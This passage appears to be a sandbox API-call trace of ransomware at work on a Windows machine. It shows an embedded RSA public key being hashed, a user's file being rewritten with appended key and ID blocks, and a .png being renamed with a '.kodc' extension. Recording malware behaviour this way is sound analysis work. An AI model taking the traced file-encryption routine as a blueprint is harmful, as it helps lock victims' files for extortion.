dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.246] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0099.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.247] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.247] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xd9aa, lpOverlapped=0x0) returned 1 [0099.247] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.248] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0099.248] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.248] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.248] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693378) returned 1 [0099.249] CryptCreateHash (in: hProv=0x693378, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0099.249] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.249] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0099.249] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0099.249] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0099.249] GetLastError () returned 0x0 [0099.249] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0099.249] CryptReleaseContext (hProv=0x693378, dwFlags=0x0) returned 1 [0099.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.249] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0099.249] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0099.249] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.249] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0099.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.249] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.249] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd9b0) returned 0x9ba6d90 [0099.249] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.250] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0099.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0099.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0099.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9dd08 [0099.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331adc0 [0099.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9dd50 [0099.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331add8 [0099.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ae08 [0099.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0099.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ae20 [0099.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0099.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0099.250] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0099.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0099.250] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ae08 | out: hHeap=0x630000) returned 1 [0099.250] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ae20 | out: hHeap=0x630000) returned 1 [0099.250] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0099.250] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0099.250] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0099.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0099.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331ae20 [0099.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0099.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331ae08 [0099.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0099.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c658 [0099.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0099.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0099.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c770 [0099.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0099.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.252] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0099.252] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ae20 | out: hHeap=0x630000) returned 1 [0099.252] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.252] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ae08 | out: hHeap=0x630000) returned 1 [0099.252] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0099.252] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.252] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0099.252] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0099.252] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0099.252] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.252] GetCurrentThreadId () returned 0x42c [0099.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0099.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba4f58 [0099.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0099.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0099.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0099.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0099.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.253] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.253] GetCurrentThreadId () returned 0x42c [0099.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.253] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0099.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.253] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.253] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.253] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0099.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0099.253] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0099.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0099.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0099.254] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0099.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0099.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0099.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0099.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ae08 [0099.254] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0099.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0099.255] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0099.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0099.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0099.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ae20 [0099.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0099.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0099.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0099.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331adf0 [0099.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0099.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0099.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0099.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0099.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0099.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331ae38 [0099.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0099.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a520 [0099.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0099.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0099.258] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.258] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0099.258] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0099.258] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0099.258] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ae08 | out: hHeap=0x630000) returned 1 [0099.258] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ae08 [0099.258] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0099.258] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0099.258] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0099.258] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0099.258] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0099.258] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0099.258] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0099.258] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c428 [0099.258] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.258] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0099.258] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ae08 | out: hHeap=0x630000) returned 1 [0099.259] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x6948b0 [0099.259] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0099.259] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0099.259] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.259] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0099.259] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0099.259] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0099.259] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0099.259] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0099.259] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.259] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6948b0 | out: hHeap=0x630000) returned 1 [0099.259] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0099.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ae38 | out: hHeap=0x630000) returned 1 [0099.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0099.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0099.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ae20 | out: hHeap=0x630000) returned 1 [0099.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331adf0 | out: hHeap=0x630000) returned 1 [0099.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0099.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0099.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0099.260] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331add8 | out: hHeap=0x630000) returned 1 [0099.261] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9dd50 | out: hHeap=0x630000) returned 1 [0099.261] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0099.261] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0099.261] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.261] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0099.261] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0099.261] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.261] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0099.261] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0099.261] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.261] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.261] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0099.262] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba6d90*, nNumberOfBytesToWrite=0xd9a5, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba6d90*, lpNumberOfBytesWritten=0x9e2fb14*=0xd9a5, lpOverlapped=0x0) returned 1 [0099.262] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba6d90 | out: hHeap=0x630000) returned 1 [0099.262] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xd9aa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.262] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0099.262] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0099.262] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0099.263] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333b018 [0099.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333b018, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0099.263] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333a888 [0099.263] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.263] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0099.263] WriteFile (in: hFile=0x5cc, lpBuffer=0x333a888*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333a888*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0099.263] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0099.263] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.263] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0099.263] CloseHandle (hObject=0x5cc) returned 1 [0099.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0099.265] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0099.265] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0099.265] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4gJpk _7JzbYAnh6P1h.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\4gjpk _7jzbyanh6p1h.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4gJpk _7JzbYAnh6P1h.png.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\4gjpk _7jzbyanh6p1h.png.kodc")) returned 1 [0099.266] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0099.266] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.266] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.268] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0099.268] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7669b70, ftCreationTime.dwHighDateTime=0x1d5bc27, ftLastAccessTime.dwLowDateTime=0x8c6bf8c0, ftLastAccessTime.dwHighDateTime=0x1d5c566, ftLastWriteTime.dwLowDateTime=0x8c6bf8c0, ftLastWriteTime.dwHighDateTime=0x1d5c566, nFileSizeHigh=0x0, nFileSizeLow=0x83d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5T6c_NBU.gif", cAlternateFileName="")) returned 1 [0099.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0099.268] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, 